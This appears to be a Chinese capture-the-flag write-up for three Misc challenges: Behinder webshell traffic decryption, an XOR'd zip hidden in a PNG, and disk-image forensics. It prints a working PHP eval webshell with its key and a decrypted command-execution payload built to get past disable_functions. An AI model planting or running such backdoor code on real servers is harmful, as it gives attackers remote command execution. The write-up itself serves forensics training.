2023年台州市初赛Misc

2023年台州市初赛Misc

这是神马

冰蝎流量，找到key

<?php
@error_reporting(0);
session_start();
    $key="144a6b2296333602"; 
        $_SESSION['k']=$key;
        session_write_close();
        $post=file_get_contents("php://input");
        if(!extension_loaded('openssl'))
        {
                $t="base64_"."decode";
                $post=$t($post."");
                
                for($i=0;$i<strlen($post);$i++) {
                             $post[$i] = $post[$i]^$key[$i+1&15]; 
                            }
        }
        else
        {
                $post=openssl_decrypt($post, "AES128", $key);
        }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
        class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

key=144a6b2296333602，对密文进行aes解密

在线aes解密网站：http://tools.bugscaner.com/cryptoaes/

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

在这个密文中得到

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$cmd="Y2QgL3Zhci93d3cvaHRtbC91cGxvYWQvLi4vO3RhciAtY3p2ZiAtIGZsYWcgfCBvcGVuc3NsIGRlczMgLXNhbHQgLWsgdGgxc2lzS2V5IC1vdXQgLi9mbGFnLnRhci5neg==";$cmd=base64_decode($cmd);$path="L3Zhci93d3cvaHRtbC91cGxvYWQvLi4v";$path=base64_decode($path);
main($cmd,$path);

对cmd解base64得到解压命令

cd /var/www/html/upload/../;tar -czvf - flag | openssl des3 -salt -k th1sisKey -out ./flag.tar.gz

对flag.tar.gz解压

openssl des3 -d -salt -in ./flag.tar.gz -k th1sisKey -out ./decrypted_flag.tar

得到emoji，aes-emoji解密，key就是th1sisKey

Black Mamba

是png文件，文件尾多余数据提取

观察结构，符合zip头

for i in range(1,200):
    if i ^ 0x48 == 0x50:
        print(i)

那直接爆破一下，得知结果是异或24

得到zip，备注说是常见密码

爆了很久没出，最后翻文件找到了之前做渗透时收集的密码本

爆破了好几本才得到密码

一开始还没看出来，字符集改为utf-8

那么直接随波逐流梭一下键盘密码

李先生的计算机

ad1是磁盘文件，FTK挂载

挂载成功后发现名为[email protected]_3684的文件夹

里面是sqlite数据，导入查看

得到了金额是600，以及文件内7z文件的密码（文件名为1的文件是7z文件）微信号是dbt_1126_tta

既然是jpg的隐写，那么把常见的都试一遍

最后发现是jphs

得到银行卡号：6222025567723373838

flag格式：DASCTF

那拼接一下 DASCTF{600_6222025567723373838}